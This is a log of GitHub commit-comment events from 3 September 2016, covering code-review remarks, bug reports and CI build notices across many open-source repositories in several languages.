{"id":"4511946042","type":"CommitCommentEvent","actor":{"login":"okitec"},"repo":{"name":"drt2016/TanzschulApp"},"payload":{"comment":{"id":18889680,"position":37,"line":66,"path":"Tanzpartnervermittlungsapp/src/model/ProfileData.java","commit_id":"1ce424ba9b95bde928c4969884108d633a58326a","created_at":"2016-09-03T10:08:44Z","updated_at":"2016-09-03T10:08:44Z","body":"The method names `getHight` and `setHight` are still wrong."}},"created_at":"2016-09-03T10:08:44Z"}
{"id":"4511955750","type":"CommitCommentEvent","actor":{"login":"imufun"},"repo":{"name":"imufun/Book"},"payload":{"comment":{"id":18889685,"position":13,"line":90,"path":"classes/Cart.php","commit_id":"bb46c75120724a7720ae3e11248bde685f216ad3","created_at":"2016-09-03T10:17:46Z","updated_at":"2016-09-03T10:17:46Z","body":"//delete itam product from details page"}},"created_at":"2016-09-03T10:17:46Z"}
{"id":"4511956854","type":"CommitCommentEvent","actor":{"login":"Bauuuuu"},"repo":{"name":"Bauuuuu/android_device_zte_nx512j"},"payload":{"comment":{"id":18889686,"position":null,"line":null,"path":null,"commit_id":"930a95eb1f0258cc91b20a5f997f5b5f52e1faca","created_at":"2016-09-03T10:18:55Z","updated_at":"2016-09-03T10:18:55Z","body":"google camera is not the best camera app. I think it should be ok as long as snapcamera works"}},"created_at":"2016-09-03T10:18:55Z"}
{"id":"4511957659","type":"CommitCommentEvent","actor":{"login":"rycee"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18889687,"position":null,"line":null,"path":null,"commit_id":"297008b9593d0be4c0eedb084b0e99cf850ce3a4","created_at":"2016-09-03T10:19:41Z","updated_at":"2016-09-03T10:19:41Z","body":"Seems to be a bigger issue.\r\n\r\nFor `nixpkgs.blackshades`:\r\n```\r\nrycee@beta:~/devel/nixpkgs$ ./result/bin/blackshades \r\nSTUB: InitGL at Source/GameInitDispose.cpp, line 3879, thread 25723\r\n(OpenGL) SDL SetVideoMode failed: X11 driver not configured with OpenGL\r\n```\r\n\r\nAnd for `nixpkgs.bitsnbots`:\r\n```\r\nrycee@beta:~/devel/nixpkgs$ ./result/bin/bitsnbots\r\nUnable to dynamically open GL lib : No dynamic GL support in video driver\r\nPANIC: unprotected error in call to Lua API (attempt to index a string value)\r\nAborted\r\n```"}},"created_at":"2016-09-03T10:19:41Z"}
{"id":"4511959733","type":"CommitCommentEvent","actor":{"login":"vcunat"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18889688,"position":null,"line":null,"path":null,"commit_id":"297008b9593d0be4c0eedb084b0e99cf850ce3a4","created_at":"2016-09-03T10:21:40Z","updated_at":"2016-09-03T10:21:40Z","body":"Hmm, I wonder if it's always with lua..."}},"created_at":"2016-09-03T10:21:40Z"}
{"id":"4511959982","type":"CommitCommentEvent","actor":{"login":"anyc"},"repo":{"name":"anyc/snd-bcd2000"},"payload":{"comment":{"id":18889689,"position":null,"line":null,"path":null,"commit_id":"d21ee3d162e997a5c8f1bff307c4d2729271a407","created_at":"2016-09-03T10:21:55Z","updated_at":"2016-09-03T10:21:55Z","body":"Hello willianrm,\r\n\r\nsorry, I somehow missed your comment. Are you still trying to get this work? You have to checkout the code from the audio branch, not the master branch. So far, I seems to work."}},"created_at":"2016-09-03T10:21:55Z"}
{"id":"4511960706","type":"CommitCommentEvent","actor":{"login":"AnZuev"},"repo":{"name":"AnZuev/StudCloud.WA"},"payload":{"comment":{"id":18889691,"position":13,"line":13,"path":"routes/documents/handlers/addDislike.js","commit_id":"ddcb3d1734d5ab242de6bf5a939784adef03030b","created_at":"2016-09-03T10:22:28Z","updated_at":"2016-09-03T10:22:28Z","body":"Конечно можно в любом месте его забрать, в этом и смысл sso: у тебя везде доступна информация о юзере, если пользователь залогинен)\r\n"}},"created_at":"2016-09-03T10:22:28Z"}
{"id":"4511960776","type":"CommitCommentEvent","actor":{"login":"vcunat"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18889692,"position":null,"line":null,"path":null,"commit_id":"297008b9593d0be4c0eedb084b0e99cf850ce3a4","created_at":"2016-09-03T10:22:31Z","updated_at":"2016-09-03T10:22:31Z","body":"... and blackshades seems to have no dependency on it."}},"created_at":"2016-09-03T10:22:31Z"}
{"id":"4511961176","type":"CommitCommentEvent","actor":{"login":"AnZuev"},"repo":{"name":"AnZuev/StudCloud.WA"},"payload":{"comment":{"id":18889693,"position":13,"line":13,"path":"routes/documents/handlers/addDislike.js","commit_id":"ddcb3d1734d5ab242de6bf5a939784adef03030b","created_at":"2016-09-03T10:22:54Z","updated_at":"2016-09-03T10:22:54Z","body":"Тут вопрос - при лайках или других \"отметках\" пользователя, нам надо показывать только айди или ещё и имя? - показывать на клиенте или указывать при добавлении?"}},"created_at":"2016-09-03T10:22:54Z"}
{"id":"4511961191","type":"CommitCommentEvent","actor":{"login":"Treeston"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":18889694,"position":null,"line":null,"path":null,"commit_id":"a4623efaa67be1cfea19e561be83f118a784b9d1","created_at":"2016-09-03T10:22:54Z","updated_at":"2016-09-03T10:22:54Z","body":"Well, it was calling everything twice, but if you call, say, a movement command twice then there's gonna be no visible difference to calling it once, so...."}},"created_at":"2016-09-03T10:22:54Z"}
{"id":"4511961970","type":"CommitCommentEvent","actor":{"login":"abc123994"},"repo":{"name":"abc123994/colour"},"payload":{"comment":{"id":18889696,"position":null,"line":null,"path":null,"commit_id":"96ec31dc200eb40dc2d515ecc2f3d824311817db","created_at":"2016-09-03T10:23:33Z","updated_at":"2016-09-03T10:23:33Z","body":"1.更改UI介面\r\n2.合併內容物\r\n3.刪掉過於冗長的測試"}},"created_at":"2016-09-03T10:23:33Z"}
{"id":"4511962021","type":"CommitCommentEvent","actor":{"login":"Hostiphre"},"repo":{"name":"Hostiphre/M0921"},"payload":{"comment":{"id":18889697,"position":16,"line":15,"path":"Part_II_Theory/2D._symmetry-of-gsh-and-wigner-3j-symbol.tex","commit_id":"5256be609941c264cf5aced490e17edd510091b9","created_at":"2016-09-03T10:23:36Z","updated_at":"2016-09-03T10:23:36Z","body":"it is an equation of 3j symbol not phase factor"}},"created_at":"2016-09-03T10:23:36Z"}
{"id":"4511962132","type":"CommitCommentEvent","actor":{"login":"AnZuev"},"repo":{"name":"AnZuev/StudCloud.WA"},"payload":{"comment":{"id":18889698,"position":15,"line":15,"path":"routes/documents/handlers/addDislike.js","commit_id":"ddcb3d1734d5ab242de6bf5a939784adef03030b","created_at":"2016-09-03T10:23:41Z","updated_at":"2016-09-03T10:23:41Z","body":"Вывод в смысле ответ клиенту?"}},"created_at":"2016-09-03T10:23:41Z"}
{"id":"4511963135","type":"CommitCommentEvent","actor":{"login":"boswelja"},"repo":{"name":"ds84182/AndroidN-ify"},"payload":{"comment":{"id":18889699,"position":null,"line":null,"path":null,"commit_id":"128f0a323f715fdf25eb5d1415bc36ae6d45fe0c","created_at":"2016-09-03T10:24:29Z","updated_at":"2016-09-03T10:24:29Z","body":"If the issue only affects cm12.1, shouldn't this only apply to sdk21 and 22?\r\nUnless this has been tested and doesn't cause any problems on sdk23"}},"created_at":"2016-09-03T10:24:29Z"}
{"id":"4511963368","type":"CommitCommentEvent","actor":{"login":"flyafly"},"repo":{"name":"michaelliao/awesome-python-webapp"},"payload":{"comment":{"id":18889700,"position":null,"line":null,"path":null,"commit_id":"4f642424e20c2f7011a11599e1ee6ce0c6f28c34","created_at":"2016-09-03T10:24:46Z","updated_at":"2016-09-03T10:24:46Z","body":"a735465047 说得很对啊，很不容易啊"}},"created_at":"2016-09-03T10:24:46Z"}
{"id":"4511963985","type":"CommitCommentEvent","actor":{"login":"splitbrain"},"repo":{"name":"Ellusu/dokuwikibot-plugin"},"payload":{"comment":{"id":18889702,"position":43,"line":43,"path":"remote.php","commit_id":"79e70327eefc08e3e0a8142d9f1ea853eb3ca856","created_at":"2016-09-03T10:25:17Z","updated_at":"2016-09-03T10:25:17Z","body":"this file does nothing and should not be checked in"}},"created_at":"2016-09-03T10:25:17Z"}
{"id":"4511964358","type":"CommitCommentEvent","actor":{"login":"vcunat"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18889703,"position":null,"line":null,"path":null,"commit_id":"297008b9593d0be4c0eedb084b0e99cf850ce3a4","created_at":"2016-09-03T10:25:37Z","updated_at":"2016-09-03T10:25:37Z","body":"Opened an issue to better track this: https://github.com/NixOS/nixpkgs/issues/18247"}},"created_at":"2016-09-03T10:25:37Z"}
{"id":"4511964373","type":"CommitCommentEvent","actor":{"login":"splitbrain"},"repo":{"name":"Ellusu/dokuwikibot-plugin"},"payload":{"comment":{"id":18889705,"position":10,"line":10,"path":"conf/metadata.php","commit_id":"79e70327eefc08e3e0a8142d9f1ea853eb3ca856","created_at":"2016-09-03T10:25:38Z","updated_at":"2016-09-03T10:25:38Z","body":"this file does nothing and should not be checked in"}},"created_at":"2016-09-03T10:25:38Z"}
{"id":"4511964443","type":"CommitCommentEvent","actor":{"login":"splitbrain"},"repo":{"name":"Ellusu/dokuwikibot-plugin"},"payload":{"comment":{"id":18889706,"position":8,"line":8,"path":"conf/default.php","commit_id":"79e70327eefc08e3e0a8142d9f1ea853eb3ca856","created_at":"2016-09-03T10:25:44Z","updated_at":"2016-09-03T10:25:44Z","body":"this file does nothing and should not be checked in"}},"created_at":"2016-09-03T10:25:44Z"}
{"id":"4511965328","type":"CommitCommentEvent","actor":{"login":"Hostiphre"},"repo":{"name":"Hostiphre/M0921"},"payload":{"comment":{"id":18889707,"position":55,"line":213,"path":"Part_II_Theory/2D._symmetry-of-gsh-and-wigner-3j-symbol.tex","commit_id":"5256be609941c264cf5aced490e17edd510091b9","created_at":"2016-09-03T10:26:33Z","updated_at":"2016-09-03T10:26:33Z","body":"no difference in Lyx"}},"created_at":"2016-09-03T10:26:33Z"}
{"id":"4511965817","type":"CommitCommentEvent","actor":{"login":"splitbrain"},"repo":{"name":"Ellusu/dokuwikibot-plugin"},"payload":{"comment":{"id":18889708,"position":35,"line":35,"path":"telegramClass.php","commit_id":"79e70327eefc08e3e0a8142d9f1ea853eb3ca856","created_at":"2016-09-03T10:27:01Z","updated_at":"2016-09-03T10:27:01Z","body":"php includes should not end with ?>"}},"created_at":"2016-09-03T10:27:01Z"}
{"id":"4511966202","type":"CommitCommentEvent","actor":{"login":"AnZuev"},"repo":{"name":"AnZuev/StudCloud.WA"},"payload":{"comment":{"id":18889710,"position":15,"line":15,"path":"routes/documents/handlers/getComments.js","commit_id":"ddcb3d1734d5ab242de6bf5a939784adef03030b","created_at":"2016-09-03T10:27:18Z","updated_at":"2016-09-03T10:27:18Z","body":"Она отработает, да. Но это не является ошибкой типа ValidationError, то есть логически так не очень хорошо делать"}},"created_at":"2016-09-03T10:27:18Z"}
{"id":"4511966881","type":"CommitCommentEvent","actor":{"login":"jojoe77777"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":18889711,"position":82,"line":82,"path":"src/pocketmine/level/generator/structure/PieceLayoutBuilder.php","commit_id":"3d7da60bb0ebe996de5f55a4b308d3c7bedce814","created_at":"2016-09-03T10:27:57Z","updated_at":"2016-09-03T10:27:57Z","body":"That could just be a comment..."}},"created_at":"2016-09-03T10:27:57Z"}
{"id":"4511968851","type":"CommitCommentEvent","actor":{"login":"yossigil"},"repo":{"name":"SpartanRefactoring/spartan-refactoring"},"payload":{"comment":{"id":18889713,"position":null,"line":null,"path":null,"commit_id":"473473d305901249bc7c5a99980239cf0c271c6c","created_at":"2016-09-03T10:29:44Z","updated_at":"2016-09-03T10:29:44Z","body":"I am not sure I understand: `i=1^i` is not compiled?"}},"created_at":"2016-09-03T10:29:44Z"}
{"id":"4511971845","type":"CommitCommentEvent","actor":{"login":"fransua"},"repo":{"name":"AlishaMechtley/ete"},"payload":{"comment":{"id":18889716,"position":3,"line":3,"path":"ete3/tools/ete_treematcher.py","commit_id":"0cff1a905394abbdddfb85140622c41b73d789b4","created_at":"2016-09-03T10:32:18Z","updated_at":"2016-09-03T10:32:18Z","body":"this is not working.\r\naccording to your use of it, I guess it should be:\r\n`from .common import log`"}},"created_at":"2016-09-03T10:32:18Z"}
{"id":"4511972229","type":"CommitCommentEvent","actor":{"login":"KrisVos130"},"repo":{"name":"Musare/MusareNode"},"payload":{"comment":{"id":18889717,"position":null,"line":null,"path":null,"commit_id":"6a5c5d59058b371607a25b5a6d9959dc72371d47","created_at":"2016-09-03T10:32:40Z","updated_at":"2016-09-03T10:32:40Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;N822hs6P&#x2F;17-station-logic-server-side\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Station logic server side</a>"}},"created_at":"2016-09-03T10:32:40Z"}
{"id":"4511973153","type":"CommitCommentEvent","actor":{"login":"smgaya"},"repo":{"name":"mtorrisi/WEKA-portlet"},"payload":{"comment":{"id":18889719,"position":null,"line":null,"path":null,"commit_id":"16dc4d8ae5fe1c41e21279adfefc5ef91c4c00e4","created_at":"2016-09-03T10:33:30Z","updated_at":"2016-09-03T10:33:30Z","body":"You did very big work Mario Thanks , did you replace pilot script with Wrf  link file docroot/WEB-INF/job/pilot_script.sh "}},"created_at":"2016-09-03T10:33:30Z"}
{"id":"4511974202","type":"CommitCommentEvent","actor":{"login":"baoliangquan"},"repo":{"name":"baoliangquan/xuexi"},"payload":{"comment":{"id":18889720,"position":null,"line":null,"path":null,"commit_id":"1ab0be25ce313af8dfb90a543a7fd87016000a5d","created_at":"2016-09-03T10:34:25Z","updated_at":"2016-09-03T10:34:25Z","body":"111"}},"created_at":"2016-09-03T10:34:25Z"}
{"id":"4511976178","type":"CommitCommentEvent","actor":{"login":"TWiStErRob"},"repo":{"name":"hopestarter/hopestarter-android"},"payload":{"comment":{"id":18889725,"position":null,"line":null,"path":null,"commit_id":"a78612346ccfbf178caf4e72d3fb0f024dd089fa","created_at":"2016-09-03T10:36:15Z","updated_at":"2016-09-03T10:36:15Z","body":"This commit is missing `tip_close_icon_normal` and `tip_close_icon_tapped` resources."}},"created_at":"2016-09-03T10:36:15Z"}
{"id":"4511977076","type":"CommitCommentEvent","actor":{"login":"jorgemorgado"},"repo":{"name":"ttilberg/dashing-barchart"},"payload":{"comment":{"id":18889726,"position":null,"line":null,"path":null,"commit_id":"1d5e69f7eb82d8293b39b0c6235adef4c21bf621","created_at":"2016-09-03T10:37:07Z","updated_at":"2016-09-03T10:37:07Z","body":"Hi. Please send me a pull request for this change. Thanks."}},"created_at":"2016-09-03T10:37:07Z"}
{"id":"4511977124","type":"CommitCommentEvent","actor":{"login":"mtdr"},"repo":{"name":"AnZuev/StudCloud.WA"},"payload":{"comment":{"id":18889727,"position":13,"line":13,"path":"routes/documents/handlers/addDislike.js","commit_id":"ddcb3d1734d5ab242de6bf5a939784adef03030b","created_at":"2016-09-03T10:37:09Z","updated_at":"2016-09-03T10:37:09Z","body":"Мне не надо делать объект {имя;айди}?"}},"created_at":"2016-09-03T10:37:09Z"}
{"id":"4511977492","type":"CommitCommentEvent","actor":{"login":"mtdr"},"repo":{"name":"AnZuev/StudCloud.WA"},"payload":{"comment":{"id":18889728,"position":15,"line":15,"path":"routes/documents/handlers/addDislike.js","commit_id":"ddcb3d1734d5ab242de6bf5a939784adef03030b","created_at":"2016-09-03T10:37:30Z","updated_at":"2016-09-03T10:37:30Z","body":"Да, то, что в итоге отдаётся на фронтенд"}},"created_at":"2016-09-03T10:37:30Z"}
{"id":"4511977764","type":"CommitCommentEvent","actor":{"login":"TWiStErRob"},"repo":{"name":"hopestarter/hopestarter-android"},"payload":{"comment":{"id":18889729,"position":null,"line":null,"path":null,"commit_id":"a78612346ccfbf178caf4e72d3fb0f024dd089fa","created_at":"2016-09-03T10:37:45Z","updated_at":"2016-09-03T10:37:45Z","body":"Also missing `android:src=\"@drawable/tip_pointer\"` used in `activity_main_tabbed.xml`"}},"created_at":"2016-09-03T10:37:45Z"}
{"id":"4511978331","type":"CommitCommentEvent","actor":{"login":"mtdr"},"repo":{"name":"AnZuev/StudCloud.WA"},"payload":{"comment":{"id":18889730,"position":15,"line":15,"path":"routes/documents/handlers/getComments.js","commit_id":"ddcb3d1734d5ab242de6bf5a939784adef03030b","created_at":"2016-09-03T10:38:16Z","updated_at":"2016-09-03T10:38:16Z","body":"Это понятно, я про dbError "}},"created_at":"2016-09-03T10:38:16Z"}
{"id":"4511979751","type":"CommitCommentEvent","actor":{"login":"ramakrishnaippili"},"repo":{"name":"egovernments/eGov"},"payload":{"comment":{"id":18889731,"position":397,"line":1163,"path":"egov/egov-ptis/src/main/java/org/egov/ptis/domain/service/property/PropertyExternalService.java","commit_id":"2dfa7134b1802c96b88d5098d5a86d010ac7f6a2","created_at":"2016-09-03T10:39:24Z","updated_at":"2016-09-03T10:39:24Z","body":"if (PROP_CREATE_RSN_BIFUR.equals(propertyMutationMaster.getCode())) is more readable and safe"}},"created_at":"2016-09-03T10:39:24Z"}
{"id":"4511980286","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18889733,"position":null,"line":null,"path":null,"commit_id":"f483a3c5a9b7110aa681e35019b38d1f4fdacdf6","created_at":"2016-09-03T10:39:57Z","updated_at":"2016-09-03T10:39:57Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 913](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12465&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-03T10:39:57Z"}
{"id":"4511980331","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18889734,"position":null,"line":null,"path":null,"commit_id":"b75f48f0c9dad1d4e3154db3af30b034463dab2c","created_at":"2016-09-03T10:39:59Z","updated_at":"2016-09-03T10:39:59Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 914](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12466&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-03T10:39:59Z"}
{"id":"4511980826","type":"CommitCommentEvent","actor":{"login":"dngreenst"},"repo":{"name":"SpartanRefactoring/spartan-refactoring"},"payload":{"comment":{"id":18889735,"position":null,"line":null,"path":null,"commit_id":"473473d305901249bc7c5a99980239cf0c271c6c","created_at":"2016-09-03T10:40:24Z","updated_at":"2016-09-03T10:40:24Z","body":"As far as eclipse is concerned, all variations of k=k^1 are alright and do not cause any compilation problem.\r\n\r\nThe problem is when trying to \"compile\" it through the trimmer. \r\n\r\n\"k = k ^ 1\" (that is, with spaces) is compiled, while \"k=k^1\" (no spaces), \"k=k ^1\" and \"k=k^ 1\" are not. \r\n\r\nWe believe that it has something to do with the tide.cleanup function: ^ operator does appear different then others in it. I am still trying to research it, but I suspect it has something to do with the way java.regex represents a newline ((?m))."}},"created_at":"2016-09-03T10:40:24Z"}
{"id":"4511981776","type":"CommitCommentEvent","actor":{"login":"jorgemorgado"},"repo":{"name":"ttilberg/dashing-barchart"},"payload":{"comment":{"id":18889738,"position":null,"line":null,"path":null,"commit_id":"1d5e69f7eb82d8293b39b0c6235adef4c21bf621","created_at":"2016-09-03T10:41:19Z","updated_at":"2016-09-03T10:41:19Z","body":"Actually never mind. I will make the update from your patch since this is useful to also update other widgets that suffer from the same problems. Thanks again."}},"created_at":"2016-09-03T10:41:19Z"}
{"id":"4511982534","type":"CommitCommentEvent","actor":{"login":"webknjaz"},"repo":{"name":"GDG-Ukraine/hoverboard"},"payload":{"comment":{"id":18889739,"position":14,"line":11,"path":".travis.yml","commit_id":"1fc6c57053460a04252718338e434587672b00bd","created_at":"2016-09-03T10:41:57Z","updated_at":"2016-09-03T10:41:57Z","body":"Semantically, this should be done with `deploy` section of TravisCI config: https://docs.travis-ci.com/user/deployment/\r\n\r\nFirebase provider is seamlessly supported: https://github.com/webknjaz/dpl#firebase"}},"created_at":"2016-09-03T10:41:57Z"}
{"id":"4511987007","type":"CommitCommentEvent","actor":{"login":"sgdc3"},"repo":{"name":"AuthMe/AuthMeReloaded"},"payload":{"comment":{"id":18889747,"position":null,"line":null,"path":null,"commit_id":"0d368ef1a2f72b4133f69ddbb4cd3ff82d9742ca","created_at":"2016-09-03T10:46:03Z","updated_at":"2016-09-03T10:46:03Z","body":"What's the source of the artifact?"}},"created_at":"2016-09-03T10:46:03Z"}
{"id":"4511991532","type":"CommitCommentEvent","actor":{"login":"TWiStErRob"},"repo":{"name":"hopestarter/hopestarter-android"},"payload":{"comment":{"id":18889752,"position":65,"line":65,"path":"wallet/build.gradle","commit_id":"9c9a5cee590577f9bb96948c15e2fe93f3e0bbf7","created_at":"2016-09-03T10:50:07Z","updated_at":"2016-09-03T10:50:07Z","body":"You might want to take a look at https://github.com/bumptech/glide/tree/3.0/samples/svg/src/main/java/com/bumptech/glide/samples/svg\r\nit loads SVG runtime, decreasing the APK size.\r\n\r\nThough you don't have much icons, so these 2 PNGs are probably smaller than AndroidSVG's dex classes."}},"created_at":"2016-09-03T10:50:07Z"}
{"id":"4511992778","type":"CommitCommentEvent","actor":{"login":"floribauer"},"repo":{"name":"mones88/mopidy-tidal"},"payload":{"comment":{"id":18889754,"position":null,"line":null,"path":null,"commit_id":"f79f127c06b18f11c51cda8c262f75125d40f6bc","created_at":"2016-09-03T10:51:22Z","updated_at":"2016-09-03T10:51:22Z","body":"Hi!\r\n\r\nWhat a pity. I was waiting for new features. But it's working for me so far.\r\nIf you are still interested in developing I would do some tests for you.\r\nAs I'm not a programmer (just playing around a bit) I can't help you otherwise.\r\n\r\nCheers"}},"created_at":"2016-09-03T10:51:22Z"}
{"id":"4511993055","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18889755,"position":null,"line":null,"path":null,"commit_id":"f483a3c5a9b7110aa681e35019b38d1f4fdacdf6","created_at":"2016-09-03T10:51:38Z","updated_at":"2016-09-03T10:51:38Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 913](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12465&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 237, ignored: 3 Build time: 00:11:41"}},"created_at":"2016-09-03T10:51:38Z"}
{"id":"4511993186","type":"CommitCommentEvent","actor":{"login":"TheCrazyLex"},"repo":{"name":"AOSPA/android_build"},"payload":{"comment":{"id":18889756,"position":6,"line":26,"path":"target/product/full_base_telephony.mk","commit_id":"2363911dcc2af167242e9c2b2d75160d17bd70a9","created_at":"2016-09-03T10:51:46Z","updated_at":"2016-09-03T10:51:46Z","body":"Oh yeah, but it compiles somehow xDD"}},"created_at":"2016-09-03T10:51:46Z"}
{"id":"4511993492","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18889757,"position":null,"line":null,"path":null,"commit_id":"b75f48f0c9dad1d4e3154db3af30b034463dab2c","created_at":"2016-09-03T10:52:03Z","updated_at":"2016-09-03T10:52:03Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 914](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12466&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 237, ignored: 3 Build time: 00:12:04"}},"created_at":"2016-09-03T10:52:03Z"}
{"id":"4511993788","type":"CommitCommentEvent","actor":{"login":"winlinvip"},"repo":{"name":"michaeltalyansky/state-threads"},"payload":{"comment":{"id":18889759,"position":null,"line":null,"path":null,"commit_id":"cce736426c2320ffec7c9820df49ee7a18ae638c","created_at":"2016-09-03T10:52:20Z","updated_at":"2016-09-03T10:52:20Z","body":"👍 \r\nGread job, I have merged to ST for SRS https://github.com/ossrs/state-threads/issues/1#issuecomment-244537755"}},"created_at":"2016-09-03T10:52:20Z"}
{"id":"4511994272","type":"CommitCommentEvent","actor":{"login":"zzqwer"},"repo":{"name":"zzqwer/Vote"},"payload":{"comment":{"id":18889760,"position":9,"line":28,"path":"Corporation/src/main/java/com/yc/corporation/web/handler/Adminhandler.java","commit_id":"84316dd08e94268700dda1a1c52feee1c84ed7d4","created_at":"2016-09-03T10:52:46Z","updated_at":"2016-09-03T10:52:46Z","body":"cvb"}},"created_at":"2016-09-03T10:52:46Z"}
{"id":"4511995098","type":"CommitCommentEvent","actor":{"login":"dg9vh"},"repo":{"name":"travisgoodspeed/md380tools"},"payload":{"comment":{"id":18889761,"position":null,"line":null,"path":null,"commit_id":"2163827921f34b353a67604908ac8d13831a5745","created_at":"2016-09-03T10:53:32Z","updated_at":"2016-09-03T10:53:32Z","body":"Would Check when back home this evening."}},"created_at":"2016-09-03T10:53:32Z"}
{"id":"4511996186","type":"CommitCommentEvent","actor":{"login":"KrisVos130"},"repo":{"name":"Musare/MusareNode"},"payload":{"comment":{"id":18889763,"position":null,"line":null,"path":null,"commit_id":"504eb7756ed183975930f6a6f0b66c53983ff9ba","created_at":"2016-09-03T10:54:37Z","updated_at":"2016-09-03T10:54:37Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;N822hs6P&#x2F;17-station-logic-server-side\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Station logic server side</a>"}},"created_at":"2016-09-03T10:54:37Z"}
{"id":"4511997250","type":"CommitCommentEvent","actor":{"login":"GitCop"},"repo":{"name":"ipfs/go-ipfs"},"payload":{"comment":{"id":18889765,"position":null,"line":null,"path":null,"commit_id":"7d0beb2d3504e4f0b7eb5d79bdc2ab23aa73aa38","created_at":"2016-09-03T10:55:36Z","updated_at":"2016-09-03T10:55:36Z","body":"There were the following issues with your Pull Request\n\n  * A \"License\" and a \"Signed-off-by\" trailers are required. See [the guidelines about this](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#a-license-and-a-signed-off-by-trailers-are-required)\n\nWe ask for a few features in the commit message for Open Source licensing hygiene and commit message clarity.\r\n`git commit --amend` can often help you quickly improve the commit message.\r\n[Guidelines](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#commit-messages) and [a script](https://github.com/ipfs/community/blob/master/dev/tools/hooks/setup_commit_msg_hook.sh) are available to help in the long run.\r\nYour feedback on GitCop is welcome on [this issue](https://github.com/ipfs/infrastructure/issues/23).\n\n---\nThis message was auto-generated by https://gitcop.com\n"}},"created_at":"2016-09-03T10:55:36Z"}
{"id":"4511999417","type":"CommitCommentEvent","actor":{"login":"PhantomAssassin12"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":18889771,"position":null,"line":null,"path":null,"commit_id":"9ada5542c359db68a701a845e1e1c1bb30fe96b6","created_at":"2016-09-03T10:57:48Z","updated_at":"2016-09-03T10:57:48Z","body":"dude did you successfully boot it up the cm14?"}},"created_at":"2016-09-03T10:57:48Z"}
{"id":"4512000085","type":"CommitCommentEvent","actor":{"login":"zasquash"},"repo":{"name":"djsb/arduino-websocketclient"},"payload":{"comment":{"id":18889774,"position":11,"line":11,"path":"sha1.cpp","commit_id":"5057a33b10a429cb2469a3e730c1f94336a99675","created_at":"2016-09-03T10:58:31Z","updated_at":"2016-09-03T10:58:31Z","body":"**const** uint8_t sha1InitState[] PROGMEM = {\r\n  0x01,0x23,0x45,0x67, // H0\r\n  0x89,0xab,0xcd,0xef, // H1\r\n  0xfe,0xdc,0xba,0x98, // H2\r\n  0x76,0x54,0x32,0x10, // H3\r\n  0xf0,0xe1,0xd2,0xc3  // H4\r\n};"}},"created_at":"2016-09-03T10:58:31Z"}
{"id":"4512001784","type":"CommitCommentEvent","actor":{"login":"TheCrazyLex"},"repo":{"name":"AOSPA/android_build"},"payload":{"comment":{"id":18889776,"position":6,"line":26,"path":"target/product/full_base_telephony.mk","commit_id":"2363911dcc2af167242e9c2b2d75160d17bd70a9","created_at":"2016-09-03T11:00:13Z","updated_at":"2016-09-03T11:00:13Z","body":"Fixed now @SferaDev "}},"created_at":"2016-09-03T11:00:13Z"}
{"id":"4512001902","type":"CommitCommentEvent","actor":{"login":"JustinMason"},"repo":{"name":"ClearMeasureLabs/ClearMeasureBootcamp"},"payload":{"comment":{"id":18889777,"position":null,"line":null,"path":null,"commit_id":"18a0978b24243fc97f75ff353bd7a4856499dd37","created_at":"2016-09-03T11:00:16Z","updated_at":"2016-09-03T11:00:16Z","body":"TeamCity ClearMeasureBootcamp :: 1 - Integration Build [Build 2.0.156](http://build.clear-measure.com/viewLog.html?buildId=10354&buildTypeId=ClearMeasureBootcamp_1IntegrationBuild&guest=1) is now running\n"}},"created_at":"2016-09-03T11:00:16Z"}
{"id":"4512004167","type":"CommitCommentEvent","actor":{"login":"JustinMason"},"repo":{"name":"ClearMeasureLabs/ClearMeasureBootcamp"},"payload":{"comment":{"id":18889782,"position":null,"line":null,"path":null,"commit_id":"18a0978b24243fc97f75ff353bd7a4856499dd37","created_at":"2016-09-03T11:02:22Z","updated_at":"2016-09-03T11:02:22Z","body":"TeamCity ClearMeasureBootcamp :: 1 - Integration Build [Build 2.0.156](http://build.clear-measure.com/viewLog.html?buildId=10354&buildTypeId=ClearMeasureBootcamp_1IntegrationBuild&guest=1) outcome was **SUCCESS**\nSummary: Tests passed: 72, ignored: 2 Build time: 00:02:04"}},"created_at":"2016-09-03T11:02:22Z"}
